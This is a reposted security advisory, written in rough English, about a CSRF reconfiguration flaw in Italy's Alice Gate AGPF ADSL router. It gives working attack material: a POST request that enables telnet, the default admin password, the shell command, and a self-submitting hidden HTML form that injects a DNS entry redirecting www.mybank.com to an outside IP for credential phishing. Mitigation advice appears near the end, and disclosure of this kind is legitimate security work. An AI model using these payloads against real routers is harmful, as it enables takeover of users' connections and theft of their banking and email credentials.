Alice Telecom Italia AGPF ADSL Router CSRF Reconfiguration Vulnerability

################# Alice Telecom Italia AGPF ADSL router CSRF
reconfiguration #################

## ABSTRACT

An huge number of ADSL broadband Italian users are vulnerable to
connection wiretapping and phishing. The most widely distribuited
italian ADSL router Alice Gate 2 Plus Voip Wi-Fi (AGPF), produced by
Pirelli, suffers a CSRF attack that allows an attacker to modify
internal router configuration like DNS servers, traffic routing, VoIP
configurations, DHCP parameters, and and other configurations that may
lead to a complete takeover of the user's ADSL connection. The
technique is also useful to enable hidden feature and
telnet/ftp/tftp/web extended admin interface.

## VENDOR: Alice Telecom Italia Modem/Routers manufactered by Pirelli
## MODEL: AGPF[Alice Gate VoIP 2 Plus Wi-Fi] version < 2.6.0
## PLATFORM: Customized Linux with openrg middleware on Broadcom
BCM96348 chipset.
## VULNERABILITY: CSRF and configuration injection via HTTP POST parameter
## EMAIL: emilio.pinn gmail
## AUTHOR: Emilio Pinna
## RISK: high
 
Alice Gate AGPF: CSRF reconfiguration vulnerability details
9/2/2012 23:56» advisory, agpf, alice, details, discus, embedded, gate, openrg, post, telecom

This post is part of the series of articles on CSRF vulnerability router Alice Gate VoIP 2 Plus WiFi, read the introductory article.

l router Alice Gate VoIP 2 Plus Wifi AGPF is circulated by 2008, and has a vast literature on unlocking methods via (jumpers hardware, jtag, backdoor triggers via packages on local network) in order to replace the firmware, unlock advanced menu, voip or modify the most diverse configurations.

Of the many methods for unlocking the AGPF router that the foregoing is now the most immediate, as executable with a simple POST request triggerata from an HTML page, for more exploitable via CSRF attack.
Unlocking

Warning: changes to the internal configuration of the router Alice Gate VoIP 2 Plus Wifi could be prohibited by contract with the provider, and make damage to router making it unusable. Before you make any changes, make sure you know how to restore initial settings. Run the demonstration test at your own risk.

The study on the safety of the equipment is intended for educational purposes to explain the vulnerability and how to protect your home connection pending an update by the Distributor. The author is not liable for damage to computer systems or violation arising out of the use of the techniques described. Remember that the abusive access to a computer system and punishable according to article 615-ter of the Penal Code.

The AGPF routers manufactured by Pirelli Broadband Solutions and distributed by Telecom under the name Alice Gate VoIP 2 Plus Wifi AGPF, mount a Linux kernel with openrg middleware that handles every aspect of gateway functionality, services, user interfaces, etc. The heart of the system is described by the discus configuration file, derived from the .conf file openrg openrg vanilla systems, described by a particular syntax as you notice from some published files on the Web.

The HTTP POST is used to unlock hidden features on your router in the demonstrator that I posted.
Discus .conf

The discus file DHCP.conf controls every aspect of the Linux system configuration/opernrg installed on the router, as can be seen from the main categories of configurable options:
 
 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
(openrg
  (dev())
  (admin())
  (system())
  (wbm())
  (syslog())
  (dns())
  (disk())
  (fs())
  (print_server())
  (service())
  (fw())
  (rip())
  (mcast())
  (rmt_upd())
  (voip())
  (enotify())
  (email())
  (radius())
  (cwmp())
  (manufacturer())
  (cert())
  (ssh())
  (upnp())
  (pppoe_relay())
  (qos())
  (network())
  (internal())
  (modem())
  (themanager())
)
 
Accessing individual items by specifying the path: referring for example to the third entry in DNS (dns (entry (3 (...))) with the path/dns entry/3. Any changes made to the Configuring triggers a system alignment procedure to the current configuration. For example changing the path admin/telnets/ports to open a new port triggera starting telnetd, modifying firewall rules, etc.

Knowing what to look for in around the internet you can find the manuals on discus configuration file and the entire system: a very useful handbook describing each configuration file field, a guide to programming and use.
The HTTP parameter stack_set

The web interface is accessible at the address http://192.168.1.1, exposes a few pages to configure and view the status of the router. Configurable aspects via web interface is limited to few voices such as port forwarding, dynamic dns, QoS and little else: a small part compared to the real configuration file described by the discus. conf seen above.

Some pages of the web interface CGI file called/admin.cgi with a POST request as in this example:
 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
/admin.cgi?active_page=9130&page_title=Alice - Info&mimic_button_field=submit_button_avanti: avanti..&button_value=attiva&strip_page_top=0&stack_set=(stack_set
  (0
    (path(fw/rule/loc_srv))
    (index(-1))
    (set
      (-1
        (services
          (0
            (name(de))
            (trigger
              (0
                (protocol(6))
                (dst
                  (start(90))
                  (end(90))
                )
              )
              (1
                (protocol(17))
                (dst
                  (start(90))
                  (end(90))
                )
              )
            )
          )
        )
        (enabled(1))
      )
    )
  )
)
 
 
 
The POST parameter stack_set contains entire parts of the configuration that are written on the file DHCP.conf discus. Interpreting the syntax you can try editing a path other than the one from the original request. For example, change the path admin/telnets/disabled from 1 to 0 to enable the telnet service:
 
 
1
2
3
4
5
6
/admin.cgi?active_page=9130&page_title=Alice - Info&mimic_button_field=submit_button_avanti: avanti..&button_value=attiva&strip_page_top=0&stack_set=(set
  (0
    (path(admin/telnets/disabled))
        (set(disabled(0)))
  )
)
 
 
And the telnet port is open. Come join me to port 23 telnet command using 192.168.1.1 username as admin and password as riattizzati. With the help command you can see the available commands, and with system shell spawns a busybox shell in Linux installed. I suggest you open the main administration interfaces, such as telnet and Advanced Administration menu to manage comodatemente other configurations without having to POST request each time.
CSRF

The reconfiguration technique described above via simple POST request lends itself perfectly to a CSRF attack with which force a user's browser victim to make a request to take control of your router. The conditions necessary for an attack are enabled by default:

No authentication is required to access the web interface
No anti CSRF token is used

It is therefore case, simply forge a web page and access the victim to carry out any attack such as those described in the introductory article. Intercept the connections by subtracting the credentials of email, social sites, home banking, etc. It is one of the easiest attacks to be made: as the hosts connected to the internal network using router as DNS server the router itself, just add an entry to divert the connections to a clone site, or a reverse proxy, which collect the credentials of users vulnerable.

Let's see how to make an HTML page, which when displayed by a vulnerable user configures the router Alice Gate VoIP 2 Plus WiFi to redirect all subsequent connections to www.mybank.com to disse.cting.org, this blog.
 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
(stack_set
  (0
    (path(dns/entry))
    (index(-1))
    (set
      (-1
        (ip(109.168.126.241))
        (hostname(www.mybank.com))
      )
    )
  )
)
 
 
Once sure the POST request is correct (attention, requests may corrupt the wrong configuration file and make the modem unusable) prepare the form for the autoesecuzione of CSRF:
 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<FORM action="http://192.168.1.1/admin.cgi" method="post">
<INPUT type=HIDDEN name="active_page" value="9130">
<INPUT type=HIDDEN name="page_title" value="Alice - Info">
<INPUT type=HIDDEN name="mimic_button_field" value="submit_button_avanti: avanti..">
<INPUT type=HIDDEN name="button_value" value="attiva">
<INPUT type=HIDDEN name="strip_page_top" value="0">
<INPUT type=HIDDEN name="stack_set" value="(stack_set
  (0
    (path(dns/entry))
    (index(-1))
    (set
      (-1
        (ip(109.168.126.241))
        (hostname(www.mybank.com))
      )
    )
  )
)
">
</FORM>
<SCRIPT>
window.onload = function(){ document.forms[0].submit(); }
</SCRIPT>
 
 
A browser that opens this page will automatically submit the form by adding the path path discus dns record malevolevolo .conf, with obvious possibility of phishing and subtracting www.mybank.com credentials. The other attacks that are described in the introductory article are equally simple to perform, and many implemented on the page of the demonstrator.
Mitigation

I contacted Telecom Italy a month ago, offering the technical analysis of the vulnerability and the demonstrator to facilitate the study. Let's see how the official fixes should solve the problem and what can we do to mitigate the vulnerability the software update pending:

Sanitize user input sent through HTTP post variable, without rewriting the configuration file via HTTP request
Implementing anti CSRF token for every form
Default-enabling the web authentication interface

The first two points are not applicable because the user vulnerable CGI is compiled into a binary that handles the web interface. The third fix does not resolve the situation but limits the cases in which the CSRF attack can go and sign. To enable login to the control panel you must:

Point your browser to the router's web interface
Access the voice menu Access on the right
Enable user authentication by selecting Turn and entering the password in the field below

From now on you will be asked for the password to authenticate with each access, making you vulnerable to CSRF only when logged into the web interface. Making sure not to navigate to other web pages while you have an active session on the control panel of your router, and log out at the end of operations, avoiding any possible CSRF attack.
 
 

More details are published in Dissecting blog:

Introduction: http://disse.cting.org/2012/09/02/alice-gate-agpf-csrf-reconf-vulnerability/
Technical details:
http://disse.cting.org/2012/09/02/alice-gate-agpf-csrf-reconf-vulnerability-details/
POC: http://disse.cting.org/codes/alice.html
 
 
 
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
 
 
Share on Google Plus

About Bradley Susser

    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment